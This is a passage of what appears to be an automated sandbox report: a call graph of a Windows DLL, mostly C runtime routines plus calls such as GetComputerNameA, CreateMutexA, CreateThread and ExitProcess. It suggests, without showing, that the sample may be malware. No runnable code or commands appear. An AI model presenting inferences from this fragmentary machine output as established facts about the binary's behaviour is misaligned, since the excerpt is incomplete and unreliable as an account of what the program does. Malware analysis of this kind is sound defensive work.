11804 329abb7 11801->11804 11806 32959b3 __fptostr 66 API calls 11802->11806 11803->11801 11807 329353a _free 66 API calls 11803->11807 11804->11796 11855 329a278 11804->11855 11805->11802 11806->11796 11809 329aba0 11807->11809 11809->11801 11811 329abcb InterlockedDecrement 11812 329ac5a InterlockedIncrement 11811->11812 11813 329ac47 11811->11813 11862 329ac71 11812->11862 11813->11812 11815 329353a _free 66 API calls 11813->11815 11816 329ac59 11815->11816 11816->11812 11818 329445f __getptd_noexit 66 API calls 11817->11818 11819 32944e0 11818->11819 11820 32944ed 11819->11820 11865 3297627 11819->11865 11822 329a807 11820->11822 11823 329a813 ___lock_fhandle 11822->11823 11824 32944d8 __getptd 66 API calls 11823->11824 11825 329a818 11824->11825 11826 329a278 __lock 66 API calls 11825->11826 11827 329a82a 11825->11827 11828 329a848 11826->11828 11830 329a838 ___lock_fhandle 11827->11830 11834 3297627 __amsg_exit 66 API calls 11827->11834 11829 329a891 11828->11829 11831 329a879 InterlockedIncrement 11828->11831 11832 329a85f InterlockedDecrement 11828->11832 11875 329a8a2 11829->11875 11830->11791 11831->11829 11832->11831 11835 329a86a 11832->11835 11834->11830 11835->11831 11836 329353a _free 66 API calls 11835->11836 11837 329a878 11836->11837 11837->11831 11879 3294afd 11838->11879 11841 329a8e8 11843 329a8da 11841->11843 11844 329a8ed GetACP 11841->11844 11842 329a8ca GetOEMCP 11842->11843 11843->11794 11843->11796 11844->11843 11846 329a8ab getSystemCP 78 API calls 11845->11846 11847 329a947 11846->11847 11848 329a952 setSBCS 11847->11848 11851 329a996 IsValidCodePage 11847->11851 11854 329a9bb _memset __setmbcp_nolock 11847->11854 11849 32920e4 __fltout2 5 API calls 11848->11849 11850 329ab0e 11849->11850 11850->11799 11850->11800 11851->11848 11852 329a9a8 GetCPInfo 11851->11852 11852->11848 11852->11854 11902 329a677 GetCPInfo 11854->11902 11856 329a28d 11855->11856 11857 329a2a0 EnterCriticalSection 11855->11857 11922 329a1b6 11856->11922 11857->11811 11859 329a293 11859->11857 11860 3297627 __amsg_exit 65 API calls 11859->11860 11861 329a29f 11860->11861 11861->11857 11950 329a19f LeaveCriticalSection 11862->11950 11864 329ac78 11864->11796 11866 329784c __FF_MSGBANNER 66 API calls 11865->11866 11867 3297631 11866->11867 11868 329769d __NMSG_WRITE 66 API calls 11867->11868 11869 3297639 11868->11869 11872 3297602 11869->11872 11873 32974c2 _doexit 66 API calls 11872->11873 11874 3297613 11873->11874 11878 329a19f LeaveCriticalSection 11875->11878 11877 329a8a9 11877->11827 11878->11877 11880 3294b10 11879->11880 11883 3294b5d 11879->11883 11881 32944d8 __getptd 66 API calls 11880->11881 11882 3294b15 11881->11882 11885 3294b3d 11882->11885 11887 329a56b 11882->11887 11883->11841 11883->11842 11885->11883 11886 329a807 __setmbcp 68 API calls 11885->11886 11886->11883 11888 329a577 ___lock_fhandle 11887->11888 11889 32944d8 __getptd 66 API calls 11888->11889 11890 329a57c 11889->11890 11891 329a5aa 11890->11891 11893 329a58e 11890->11893 11892 329a278 __lock 66 API calls 11891->11892 11894 329a5b1 11892->11894 11895 32944d8 __getptd 66 API calls 11893->11895 11896 329a51e __updatetlocinfoEx_nolock 74 API calls 11894->11896 11897 329a593 11895->11897 11898 329a5c5 11896->11898 11899 329a5a1 ___lock_fhandle 11897->11899 11901 3297627 __amsg_exit 66 API calls 11897->11901 11900 329a5d8 _LocaleUpdate::_LocaleUpdate LeaveCriticalSection 11898->11900 11899->11885 11900->11897 11901->11899 11904 329a6ab _memset 11902->11904 11911 329a75f 11902->11911 11912 329e5ad 11904->11912 11906 32920e4 __fltout2 5 API calls 11908 329a805 11906->11908 11908->11854 11910 329e480 ___crtLCMapStringA 82 API calls 11910->11911 11911->11906 11913 3294afd _LocaleUpdate::_LocaleUpdate 76 API calls 11912->11913 11914 329e5c0 11913->11914 11915 329e4c6 __crtGetStringTypeA_stat 69 API calls 11914->11915 11916 329a71a 11915->11916 11917 329e480 11916->11917 11918 3294afd _LocaleUpdate::_LocaleUpdate 76 API calls 11917->11918 11919 329e493 11918->11919 11920 329e299 __crtLCMapStringA_stat 72 API calls 11919->11920 11921 329a73a 11920->11921 11921->11910 11923 329a1c2 ___lock_fhandle 11922->11923 11924 329784c __FF_MSGBANNER 65 API calls 11923->11924 11925 329a1e8 11923->11925 11927 329a1d7 11924->11927 11926 329721b __malloc_crt 65 API calls 11925->11926 11932 329a1f8 ___lock_fhandle 11925->11932 11928 329a203 11926->11928 11929 329769d __NMSG_WRITE 65 API calls 11927->11929 11930 329a219 11928->11930 11931 329a20a 11928->11931 11933 329a1de 11929->11933 11935 329a278 __lock 65 API calls 11930->11935 11934 32959b3 __fptostr 65 API calls 11931->11934 11932->11859 11936 32973aa __mtinitlocknum 3 API calls 11933->11936 11934->11932 11937 329a220 11935->11937 11936->11925 11938 329a228 InitializeCriticalSectionAndSpinCount 11937->11938 11939 329a253 11937->11939 11941 329a238 11938->11941 11942 329a244 11938->11942 11940 329353a _free 65 API calls 11939->11940 11940->11942 11943 329353a _free 65 API calls 11941->11943 11947 329a26f 11942->11947 11945 329a23e 11943->11945 11946 32959b3 __fptostr 65 API calls 11945->11946 11946->11942 11948 329a19f _doexit LeaveCriticalSection 11947->11948 11949 329a276 11948->11949 11949->11932 11950->11864 11954 329d23b 11951->11954 11955 3294afd _LocaleUpdate::_LocaleUpdate 76 API calls 11954->11955 11956 329d24e 11955->11956 11956->11782 11958 3295bfd 11957->11958 11959 3295c04 11957->11959 11958->11959 11962 3295c22 11958->11962 11960 32959b3 __fptostr 66 API calls 11959->11960 11965 3295c09 11960->11965 11961 3295961 __fptostr 11 API calls 11963 3295c13 11961->11963 11962->11963 11964 32959b3 __fptostr 66 API calls 11962->11964 11963->11551 11964->11965 11965->11961 11967 329adc0 EncodePointer 11966->11967 11967->11967 11968 329adda 11967->11968 11968->11564 11972 329338b 11969->11972 11971 32933d4 11971->11566 11973 3293397 ___lock_fhandle 11972->11973 11980 32973c2 11973->11980 11979 32933b8 ___lock_fhandle 11979->11971 11981 329a278 __lock 66 API calls 11980->11981 11982 329339c 11981->11982 11983 32932a4 DecodePointer DecodePointer 11982->11983 11984 3293353 11983->11984 11985 32932d2 11983->11985 11994 32933c1 11984->11994 11985->11984 11997 329734c 11985->11997 11987 3293336 EncodePointer EncodePointer 11987->11984 11988 32932e4 11988->11987 11989 3293308 11988->11989 12004 32972ac 11988->12004 11989->11984 11991 32972ac __realloc_crt 70 API calls 11989->11991 11992 3293324 EncodePointer 11989->11992 11993 329331e 11991->11993 11992->11987 11993->11984 11993->11992 12030 32973cb 11994->12030 11998 329736c HeapSize 11997->11998 11999 3297357 11997->11999 11998->11988 12000 32959b3 __fptostr 66 API calls 11999->12000 12001 329735c 12000->12001 12002 3295961 __fptostr 11 API calls 12001->12002 12003 3297367 12002->12003 12003->11988 12006 32972b5 12004->12006 12007 32972f4 12006->12007 12008 32972d5 Sleep 12006->12008 12009 329348d 12006->12009 12007->11989 12008->12006 12010 3293498 12009->12010 12011 32934a3 12009->12011 12012 329364e _malloc 66 API calls 12010->12012 12013 32934ab 12011->12013 12022 32934b8 12011->12022 12014 32934a0 12012->12014 12015 329353a _free 66 API calls 12013->12015 12014->12006 12023 32934b3 _free 12015->12023 12016 32934f0 12017 3295cea _malloc DecodePointer 12016->12017 12019 32934f6 12017->12019 12018 32934c0 HeapReAlloc 12018->12022 12018->12023 12020 32959b3 __fptostr 66 API calls 12019->12020 12020->12023 12021 3293520 12025 32959b3 __fptostr 66 API calls 12021->12025 12022->12016 12022->12018 12022->12021 12024 3295cea _malloc DecodePointer 12022->12024 12027 3293508 12022->12027 12023->12006 12024->12022 12026 3293525 GetLastError 12025->12026 12026->12023 12028 32959b3 __fptostr 66 API calls 12027->12028 12029 329350d GetLastError 12028->12029 12029->12023 12033 329a19f LeaveCriticalSection 12030->12033 12032 32933c6 12032->11979 12033->12032 12035 32974ce ___lock_fhandle 12034->12035 12036 329a278 __lock 61 API calls 12035->12036 12037 32974d5 12036->12037 12039 3297500 DecodePointer 12037->12039 12043 329757f 12037->12043 12041 3297517 DecodePointer 12039->12041 12039->12043 12053 329752a 12041->12053 12057 32975ed 12043->12057 12045 32975fc ___lock_fhandle 12045->11574 12046 32975e4 12047 32975ed 12046->12047 12048 32973aa __mtinitlocknum 3 API calls 12046->12048 12049 32975fa 12047->12049 12062 329a19f LeaveCriticalSection 12047->12062 12048->12047 12049->11574 12050 3297541 DecodePointer 12056 3294328 EncodePointer 12050->12056 12053->12043 12053->12050 12054 3297550 DecodePointer DecodePointer 12053->12054 12055 3294328 EncodePointer 12053->12055 12054->12053 12055->12053 12056->12053 12058 32975f3 12057->12058 12060 32975cd 12057->12060 12063 329a19f LeaveCriticalSection 12058->12063 12060->12045 12061 329a19f LeaveCriticalSection 12060->12061 12061->12046 12062->12049 12063->12060 12065 329c5a8 12064->12065 12066 329c58d 12064->12066 12068 329c5bb HeapAlloc 12065->12068 12071 3295cea _malloc DecodePointer 12065->12071 12072 329c5e2 12065->12072 12066->12065 12067 329c599 12066->12067 12069 32959b3 __fptostr 65 API calls 12067->12069 12068->12065 12068->12072 12070 329c59e 12069->12070 12070->11587 12071->12065 12072->11587 12073->11590 12092 329a19f LeaveCriticalSection 12074->12092 12076 329440f 12076->11595 12078 329a2c9 InterlockedIncrement 12077->12078 12079 329a2cc 12077->12079 12078->12079 12080 329a2d9 12079->12080 12081 329a2d6 InterlockedIncrement 12079->12081 12082 329a2e3 InterlockedIncrement 12080->12082 12083 329a2e6 12080->12083 12081->12080 12082->12083 12084 329a2f0 InterlockedIncrement 12083->12084 12086 329a2f3 12083->12086 12084->12086 12085 329a30c InterlockedIncrement 12085->12086 12086->12085 12087 329a31c InterlockedIncrement 12086->12087 12088 329a327 InterlockedIncrement 12086->12088 12087->12086 12088->11598 12093 329a19f LeaveCriticalSection 12089->12093 12091 329445d 12091->11600 12092->12076 12093->12091 12095 32944fe ___lock_fhandle 12094->12095 12096 3294600 ___lock_fhandle 12095->12096 12097 329353a _free 66 API calls 12095->12097 12098 3294516 12095->12098 12096->11608 12097->12098 12099 3294524 12098->12099 12100 329353a _free 66 API calls 12098->12100 12101 3294532 12099->12101 12103 329353a _free 66 API calls 12099->12103 12100->12099 12102 3294540 12101->12102 12104 329353a _free 66 API calls 12101->12104 12105 329454e 12102->12105 12106 329353a _free 66 API calls 12102->12106 12103->12101 12104->12102 12107 329455c 12105->12107 12108 329353a _free 66 API calls 12105->12108 12106->12105 12109 329456a 12107->12109 12111 329353a _free 66 API calls 12107->12111 12108->12107 12110 329457b 12109->12110 12112 329353a _free 66 API calls 12109->12112 12113 329a278 __lock 66 API calls 12110->12113 12111->12109 12112->12110 12114 3294583 12113->12114 12115 32945a8 12114->12115 12116 329458f InterlockedDecrement 12114->12116 12130 329460c 12115->12130 12116->12115 12117 329459a 12116->12117 12117->12115 12121 329353a _free 66 API calls 12117->12121 12120 329a278 __lock 66 API calls 12122 32945bc 12120->12122 12121->12115 12123 32945ed 12122->12123 12133 329a33a 12122->12133 12177 3294618 12123->12177 12127 329353a _free 66 API calls 12127->12096 12180 329a19f LeaveCriticalSection 12130->12180 12132 32945b5 12132->12120 12134 329a34b InterlockedDecrement 12133->12134 12135 32945d1 12133->12135 12136 329a360 InterlockedDecrement 12134->12136 12137 329a363 12134->12137 12135->12123 12147 329a3d3 12135->12147 12136->12137 12138 329a36d InterlockedDecrement 12137->12138 12139 329a370 12137->12139 12138->12139 12140 329a37a InterlockedDecrement 12139->12140 12141 329a37d 12139->12141 12140->12141 12142 329a387 InterlockedDecrement 12141->12142 12144 329a38a 12141->12144 12142->12144 12143 329a3a3 InterlockedDecrement 12143->12144 12144->12143 12145 329a3b3 InterlockedDecrement 12144->12145 12146 329a3be InterlockedDecrement 12144->12146 12145->12144 12146->12135 12148 329a457 12147->12148 12153 329a3ea 12147->12153 12149 329a4a4 12148->12149 12150 329353a _free 66 API calls 12148->12150 12166 329a4cd 12149->12166 12221 329dd9b 12149->12221 12152 329a478 12150->12152 12157 329353a _free 66 API calls 12152->12157 12153->12148 12155 329a41e 12153->12155 12160 329353a _free 66 API calls 12153->12160 12156 329a43f 12155->12156 12167 329353a _free 66 API calls 12155->12167 12158 329353a _free 66 API calls 12156->12158 12162 329a48b 12157->12162 12163 329a44c 12158->12163 12159 329a512 12164 329353a _free 66 API calls 12159->12164 12165 329a413 12160->12165 12161 329353a _free 66 API calls 12161->12166 12169 329353a _free 66 API calls 12162->12169 12170 329353a _free 66 API calls 12163->12170 12171 329a518 12164->12171 12181 329e17b 12165->12181 12166->12159 12168 329353a 66 API calls _free 12166->12168 12173 329a434 12167->12173 12168->12166 12174 329a499 12169->12174 12170->12148 12171->12123 12209 329e112 12173->12209 12176 329353a _free 66 API calls 12174->12176 12176->12149 12395 329a19f LeaveCriticalSection 12177->12395 12179 32945fa 12179->12127 12180->12132 12182 329e18c 12181->12182 12183 329e275 12181->12183 12184 329e19d 12182->12184 12186 329353a _free 66 API calls 12182->12186 12183->12155 12185 329e1af 12184->12185 12187 329353a _free 66 API calls 12184->12187 12188 329e1c1 12185->12188 12189 329353a _free 66 API calls 12185->12189 12186->12184 12187->12185 12190 329e1d3 12188->12190 12191 329353a _free 66 API calls 12188->12191 12189->12188 12192 329e1e5 12190->12192 12194 329353a _free 66 API calls 12190->12194 12191->12190 12193 329e1f7 12192->12193 12195 329353a _free 66 API calls 12192->12195 12196 329e209 12193->12196 12197 329353a _free 66 API calls 12193->12197 12194->12192 12195->12193 12198 329e21b 12196->12198 12199 329353a _free 66 API calls 12196->12199 12197->12196 12200 329e22d 12198->12200 12202 329353a _free 66 API calls 12198->12202 12199->12198 12201 329e23f 12200->12201 12203 329353a _free 66 API calls 12200->12203 12204 329e251 12201->12204 12205 329353a _free 66 API calls 12201->12205 12202->12200 12203->12201 12206 329e263 12204->12206 12207 329353a _free 66 API calls 12204->12207 12205->12204 12206->12183 12208 329353a _free 66 API calls 12206->12208 12207->12206 12208->12183 12210 329e11f 12209->12210 12220 329e177 12209->12220 12211 329e12f 12210->12211 12212 329353a _free 66 API calls 12210->12212 12213 329e141 12211->12213 12214 329353a _free 66 API calls 12211->12214 12212->12211 12215 329353a _free 66 API calls 12213->12215 12217 329e153 12213->12217 12214->12213 12215->12217 12216 329e165 12219 329353a _free 66 API calls 12216->12219 12216->12220 12217->12216 12218 329353a _free 66 API calls 12217->12218 12218->12216 12219->12220 12220->12156 12222 329ddac 12221->12222 12223 329a4c2 12221->12223 12224 329353a _free 66 API calls 12222->12224 12223->12161 12225 329ddb4 12224->12225 12226 329353a _free 66 API calls 12225->12226 12227 329ddbc 12226->12227 12228 329353a _free 66 API calls 12227->12228 12229 329ddc4 12228->12229 12230 329353a _free 66 API calls 12229->12230 12231 329ddcc 12230->12231 12232 329353a _free 66 API calls 12231->12232 12233 329ddd4 12232->12233 12234 329353a _free 66 API calls 12233->12234 12235 329dddc 12234->12235 12236 329353a _free 66 API calls 12235->12236 12237 329dde3 12236->12237 12238 329353a _free 66 API calls 12237->12238 12239 329ddeb 12238->12239 12240 329353a _free 66 API calls 12239->12240 12241 329ddf3 12240->12241 12242 329353a _free 66 API calls 12241->12242 12243 329ddfb 12242->12243 12244 329353a _free 66 API calls 12243->12244 12245 329de03 12244->12245 12246 329353a _free 66 API calls 12245->12246 12247 329de0b 12246->12247 12248 329353a _free 66 API calls 12247->12248 12249 329de13 12248->12249 12250 329353a _free 66 API calls 12249->12250 12251 329de1b 12250->12251 12252 329353a _free 66 API calls 12251->12252 12253 329de23 12252->12253 12254 329353a _free 66 API calls 12253->12254 12255 329de2b 12254->12255 12256 329353a _free 66 API calls 12255->12256 12257 329de36 12256->12257 12258 329353a _free 66 API calls 12257->12258 12259 329de3e 12258->12259 12260 329353a _free 66 API calls 12259->12260 12261 329de46 12260->12261 12262 329353a _free 66 API calls 12261->12262 12263 329de4e 12262->12263 12264 329353a _free 66 API calls 12263->12264 12265 329de56 12264->12265 12266 329353a _free 66 API calls 12265->12266 12267 329de5e 12266->12267 12268 329353a _free 66 API calls 12267->12268 12269 329de66 12268->12269 12270 329353a _free 66 API calls 12269->12270 12271 329de6e 12270->12271 12272 329353a _free 66 API calls 12271->12272 12273 329de76 12272->12273 12274 329353a _free 66 API calls 12273->12274 12275 329de7e 12274->12275 12276 329353a _free 66 API calls 12275->12276 12277 329de86 12276->12277 12278 329353a _free 66 API calls 12277->12278 12279 329de8e 12278->12279 12280 329353a _free 66 API calls 12279->12280 12281 329de96 12280->12281 12282 329353a _free 66 API calls 12281->12282 12283 329de9e 12282->12283 12284 329353a _free 66 API calls 12283->12284 12285 329dea6 12284->12285 12286 329353a _free 66 API calls 12285->12286 12287 329deae 12286->12287 12288 329353a _free 66 API calls 12287->12288 12289 329debc 12288->12289 12290 329353a _free 66 API calls 12289->12290 12291 329dec7 12290->12291 12292 329353a _free 66 API calls 12291->12292 12293 329ded2 12292->12293 12294 329353a _free 66 API calls 12293->12294 12295 329dedd 12294->12295 12296 329353a _free 66 API calls 12295->12296 12297 329dee8 12296->12297 12298 329353a _free 66 API calls 12297->12298 12299 329def3 12298->12299 12300 329353a _free 66 API calls 12299->12300 12301 329defe 12300->12301 12302 329353a _free 66 API calls 12301->12302 12303 329df09 12302->12303 12304 329353a _free 66 API calls 12303->12304 12305 329df14 12304->12305 12306 329353a _free 66 API calls 12305->12306 12307 329df1f 12306->12307 12308 329353a _free 66 API calls 12307->12308 12309 329df2a 12308->12309 12310 329353a _free 66 API calls 12309->12310 12311 329df35 12310->12311 12312 329353a _free 66 API calls 12311->12312 12313 329df40 12312->12313 12314 329353a _free 66 API calls 12313->12314 12315 329df4b 12314->12315 12316 329353a _free 66 API calls 12315->12316 12317 329df56 12316->12317 12318 329353a _free 66 API calls 12317->12318 12319 329df61 12318->12319 12320 329353a _free 66 API calls 12319->12320 12321 329df6f 12320->12321 12322 329353a _free 66 API calls 12321->12322 12323 329df7a 12322->12323 12324 329353a _free 66 API calls 12323->12324 12325 329df85 12324->12325 12326 329353a _free 66 API calls 12325->12326 12327 329df90 12326->12327 12328 329353a _free 66 API calls 12327->12328 12329 329df9b 12328->12329 12330 329353a _free 66 API calls 12329->12330 12331 329dfa6 12330->12331 12332 329353a _free 66 API calls 12331->12332 12333 329dfb1 12332->12333 12334 329353a _free 66 API calls 12333->12334 12335 329dfbc 12334->12335 12336 329353a _free 66 API calls 12335->12336 12337 329dfc7 12336->12337 12338 329353a _free 66 API calls 12337->12338 12339 329dfd2 12338->12339 12340 329353a _free 66 API calls 12339->12340 12341 329dfdd 12340->12341 12342 329353a _free 66 API calls 12341->12342 12343 329dfe8 12342->12343 12344 329353a _free 66 API calls 12343->12344 12345 329dff3 12344->12345 12346 329353a _free 66 API calls 12345->12346 12347 329dffe 12346->12347 12348 329353a _free 66 API calls 12347->12348 12349 329e009 12348->12349 12350 329353a _free 66 API calls 12349->12350 12351 329e014 12350->12351 12352 329353a _free 66 API calls 12351->12352 12353 329e022 12352->12353 12354 329353a _free 66 API calls 12353->12354 12355 329e02d 12354->12355 12356 329353a _free 66 API calls 12355->12356 12357 329e038 12356->12357 12358 329353a _free 66 API calls 12357->12358 12359 329e043 12358->12359 12360 329353a _free 66 API calls 12359->12360 12361 329e04e 12360->12361 12362 329353a _free 66 API calls 12361->12362 12363 329e059 12362->12363 12364 329353a _free 66 API calls 12363->12364 12365 329e064 12364->12365 12366 329353a _free 66 API calls 12365->12366 12367 329e06f 12366->12367 12368 329353a _free 66 API calls 12367->12368 12369 329e07a 12368->12369 12370 329353a _free 66 API calls 12369->12370 12371 329e085 12370->12371 12372 329353a _free 66 API calls 12371->12372 12373 329e090 12372->12373 12374 329353a _free 66 API calls 12373->12374 12375 329e09b 12374->12375 12376 329353a _free 66 API calls 12375->12376 12377 329e0a6 12376->12377 12378 329353a _free 66 API calls 12377->12378 12379 329e0b1 12378->12379 12380 329353a _free 66 API calls 12379->12380 12381 329e0bc 12380->12381 12382 329353a _free 66 API calls 12381->12382 12383 329e0c7 12382->12383 12384 329353a _free 66 API calls 12383->12384 12385 329e0d5 12384->12385 12395->12179 12430 32a4e40 12396->12430 12400 32a470a 12401 32a4711 OutputDebugStringA ExitProcess 12400->12401 12402 32a4724 12400->12402 12403 32a4e40 ___DllMainCRTStartup 19 API calls 12402->12403 12404 32a472e lstrlenA 12403->12404 12405 32a4739 12404->12405 12406 32a47ad CreateMutexA GetLastError 12404->12406 12480 329269a GetSystemTimeAsFileTime 12405->12480 12407 32a47cb CloseHandle 12406->12407 12408 32a47e2 12406->12408 12410 32920e4 __fltout2 5 API calls 12407->12410 12450 32a3c50 12408->12450 12413 32a47de 12410->12413 12412 32a4745 12482 329396a 12412->12482 12413->11469 12414 32a47e8 12462 32a6570 12414->12462 12418 32a4751 _memset 12420 32a476d wsprintfA 12418->12420 12419 32a4800 CreateThread WaitForSingleObject CloseHandle 12422 32a4e40 ___DllMainCRTStartup 19 API calls 12419->12422 13267 32a4360 12419->13267 12487 32a4d80 12420->12487 12428 32a482c 12422->12428 12423 32a48ad ctype 12424 32a48bb CoUninitialize 12423->12424 12425 32920e4 __fltout2 5 API calls 12424->12425 12426 32a48cd 12425->12426 12426->11469 12428->12423 12428->12428 12429 32a488c wsprintfA 12428->12429 12497 32a3ad0 12428->12497 12429->12419 12429->12423 12431 32a4e64 _memset 12430->12431 12432 32a4e7e GetComputerNameA 12431->12432 12433 32a4ea3 lstrcpyA 12432->12433 12434 32a4eb5 _memset 12432->12434 12433->12434 12435 32a4ec8 wsprintfA 12434->12435 12504 32a4a70 12435->12504 12438 32920e4 __fltout2 5 API calls 12439 32a46ff 12438->12439 12440 32a1c18 12439->12440 12441 32a1c27 12440->12441 12446 32a1c48 12440->12446 12443 32a1c2c 12441->12443 12441->12446 12445 32959b3 __fptostr 66 API calls 12443->12445 12444 32a1c5a 12444->12400 12447 32a1c31 12445->12447 12519 32a1b58 12446->12519 12448 3295961 __fptostr 11 API calls 12447->12448 12449 32a1c3c 12448->12449 12449->12400 12534 32928ee 12450->12534 12453 32a4e40 ___DllMainCRTStartup 19 API calls 12454 32a3c75 12453->12454 12455 32a3cdd 12454->12455 12458 32a3ad0 ___DllMainCRTStartup 69 API calls 12454->12458 12456 32a3ce6 lstrcpyA 12455->12456 12457 32a3d04 lstrcpyA 12455->12457 12456->12414 12457->12414 12459 32a3c9e 12458->12459 12459->12455 12460 32a3ca8 wsprintfA 12459->12460 12460->12414 12463 32a4e40 ___DllMainCRTStartup 19 API calls 12462->12463 12464 32a658e 12463->12464 12465 32a66be 12464->12465 12466 32a65a2 _memset 12464->12466 12467 32920e4 __fltout2 5 API calls 12465->12467 12468 32a65bb GetModuleFileNameA 12466->12468 12469 32a47f0 12467->12469 12470 32a65e0 _strrchr 12468->12470 12469->12419 12568 32930b7 12470->12568 12472 32a65ee ___DllMainCRTStartup 12473 32a66ac Sleep 12472->12473 12474 32a6601 wsprintfA 12472->12474 12476 32930b7 _strtok 66 API calls 12472->12476 12477 32928ee ___DllMainCRTStartup 77 API calls 12472->12477 12478 32a66aa 12472->12478 12479 32a665b CreateThread CloseHandle 12472->12479 12473->12465 12573 32a5650 12474->12573 12476->12472 12477->12472 12478->12473 12479->12472 12857 32a5ef0 12479->12857 12481 32926ca __aulldiv 12480->12481 12481->12412 13075 3298432 12482->13075 12484 3293975 12485 3293984 12484->12485 13083 32936e2 12484->13083 12485->12418 13259 3297010 12487->13259 12490 32a4dd2 lstrcpyA 12491 32a4de4 _memset 12490->12491 12492 32a4df7 wsprintfA lstrlenA 12491->12492 13261 32a48f0 7 API calls 12492->13261 12495 32920e4 __fltout2 5 API calls 12496 32a4e3b 12495->12496 12496->12406 12498 32a3ae5 12497->12498 12498->12498 12499 329364e _malloc 66 API calls 12498->12499 12503 32a3af4 ___DllMainCRTStartup 12499->12503 12500 329348d __realloc_crt 69 API calls 12501 32a3b3e 12500->12501 12501->12428 12502 32a3b71 12502->12428 12503->12500 12503->12502 12505 32a4adb _memset 12504->12505 12506 32a4b01 7 API calls 12505->12506 12507 32a4b95 12506->12507 12508 32a4b86 ___DllMainCRTStartup 12506->12508 12507->12508 12509 32a4ba9 12507->12509 12512 32a4c77 12507->12512 12518 32a4bf6 __mbschr_l ___DllMainCRTStartup 12507->12518 12510 32a4d19 12508->12510 12511 32a4d12 FreeLibrary 12508->12511 12509->12508 12514 32a4bdd lstrcpyA 12509->12514 12513 32920e4 __fltout2 5 API calls 12510->12513 12511->12510 12512->12508 12516 32a4ce8 wsprintfA 12512->12516 12515 32a4d37 12513->12515 12514->12508 12515->12438 12516->12508 12517 32a4c5e lstrcpyA 12517->12508 12518->12508 12518->12517 12520 3294afd _LocaleUpdate::_LocaleUpdate 76 API calls 12519->12520 12521 32a1b6c 12520->12521 12522 32a1b73 12521->12522 12523 32a1b96 12521->12523 12525 32959b3 __fptostr 66 API calls 12522->12525 12524 32a1b9e 12523->12524 12533 32a1bc2 12523->12533 12526 32959b3 __fptostr 66 API calls 12524->12526 12527 32a1b78 12525->12527 12528 32a1ba3 12526->12528 12529 3295961 __fptostr 11 API calls 12527->12529 12530 3295961 __fptostr 11 API calls 12528->12530 12531 32a1b83 ___ascii_stricmp 12529->12531 12530->12531 12531->12444 12532 329edb8 85 API calls __tolower_l 12532->12533 12533->12531 12533->12532 12536 32928f8 12534->12536 12535 329364e _malloc 66 API calls 12535->12536 12536->12535 12537 3292912 12536->12537 12538 3295cea _malloc DecodePointer 12536->12538 12539 3292914 std::exception::exception 12536->12539 12537->12453 12538->12536 12543 32933c7 __cinit 76 API calls 12539->12543 12545 3292952 12539->12545 12543->12545 12544 329296d 12546 32928c9 12545->12546 12552 3292862 12546->12552 12549 3293c0e 12550 3293c43 RaiseException 12549->12550 12551 3293c37 12549->12551 12550->12544 12551->12550 12553 3292887 12552->12553 12554 3292872 12552->12554 12553->12549 12558 329281d 12554->12558 12559 3292828 12558->12559 12560 3292830 12558->12560 12561 329353a _free 66 API calls 12559->12561 12560->12553 12562 32927dd 12560->12562 12561->12560 12563 3292810 12562->12563 12564 32927eb _strlen 12562->12564 12563->12553 12565 329364e _malloc 66 API calls 12564->12565 12566 32927fd 12565->12566 12566->12563 12567 3295bef _strcpy_s 66 API calls 12566->12567 12567->12563 12569 32944d8 __getptd 66 API calls 12568->12569 12570 32930da 12569->12570 12571 32920e4 __fltout2 5 API calls 12570->12571 12572 3293172 12571->12572 12572->12472 12574 32a5660 12573->12574 12574->12574 12575 32a566b 12574->12575 12590 3292a59 12574->12590 12575->12472 12578 32a569e 12578->12472 12580 32a568f 12606 3292d0a 12580->12606 12582 32a5695 ___DllMainCRTStartup 12582->12578 12583 32a56bb 12582->12583 12584 3292afa _fseek 101 API calls 12582->12584 12583->12472 12585 32a56cc 12584->12585 12619 3292fb9 12585->12619 12589 32a56dc 12589->12472 12635 329299d 12590->12635 12592 3292a6b 12592->12578 12593 3292afa 12592->12593 12596 3292b06 ___lock_fhandle 12593->12596 12594 3292b12 12597 32959b3 __fptostr 66 API calls 12594->12597 12595 3292b38 12696 329494f 12595->12696 12596->12594 12596->12595 12599 3292b17 12597->12599 12600 3295961 __fptostr 11 API calls 12599->12600 12605 3292b22 ___lock_fhandle 12600->12605 12605->12580 12607 3292d16 ___lock_fhandle 12606->12607 12608 3292d22 12607->12608 12609 3292d37 12607->12609 12610 32959b3 __fptostr 66 API calls 12608->12610 12611 329494f __lock_file 67 API calls 12609->12611 12612 3292d27 12610->12612 12613 3292d3f 12611->12613 12614 3295961 __fptostr 11 API calls 12612->12614 12615 3292b76 __ftell_nolock 71 API calls 12613->12615 12618 3292d32 ___lock_fhandle 12614->12618 12616 3292d4c 12615->12616 12778 3292d65 12616->12778 12618->12582 12781 3292f2b 12619->12781 12621 3292fd1 12622 3293043 12621->12622 12623 329304f ___lock_fhandle 12622->12623 12624 3293061 12623->12624 12625 3293076 12623->12625 12626 32959b3 __fptostr 66 API calls 12624->12626 12627 329494f __lock_file 67 API calls 12625->12627 12631 3293071 ___lock_fhandle 12625->12631 12628 3293066 12626->12628 12629 329308f 12627->12629 12630 3295961 __fptostr 11 API calls 12628->12630 12811 3292fd6 12629->12811 12630->12631 12631->12589 12638 32929a9 ___lock_fhandle 12635->12638 12636 32929bc 12637 32959b3 __fptostr 66 API calls 12636->12637 12639 32929c1 12637->12639 12638->12636 12640 32929e9 12638->12640 12641 3295961 __fptostr 11 API calls 12639->12641 12654 3295fa9 12640->12654 12653 32929cc ___lock_fhandle @_EH4_CallFilterFunc@8 12641->12653 12643 32929ee 12644 3292a02 12643->12644 12645 32929f5 12643->12645 12646 3292a29 12644->12646 12647 3292a09 12644->12647 12648 32959b3 __fptostr 66 API calls 12645->12648 12671 3295d12 12646->12671 12649 32959b3 __fptostr 66 API calls 12647->12649 12648->12653 12649->12653 12653->12592 12655 3295fb5 ___lock_fhandle 12654->12655 12656 329a278 __lock 66 API calls 12655->12656 12669 3295fc3 12656->12669 12657 3296038 12660 32960d3 __getstream LeaveCriticalSection 12657->12660 12658 329603f 12659 329721b __malloc_crt 66 API calls 12658->12659 12661 3296046 12659->12661 12662 32960c8 ___lock_fhandle 12660->12662 12661->12657 12663 3296054 InitializeCriticalSectionAndSpinCount 12661->12663 12662->12643 12664 3296074 12663->12664 12665 3296087 EnterCriticalSection 12663->12665 12668 329353a _free 66 API calls 12664->12668 12665->12657 12666 329a1b6 __mtinitlocknum 66 API calls 12666->12669 12667 3294990 _wprintf 67 API calls 12667->12669 12668->12657 12669->12657 12669->12658 12669->12666 12669->12667 12670 32949fe __getstream LeaveCriticalSection LeaveCriticalSection 12669->12670 12670->12669 12672 3295d34 12671->12672 12673 3295d48 12672->12673 12685 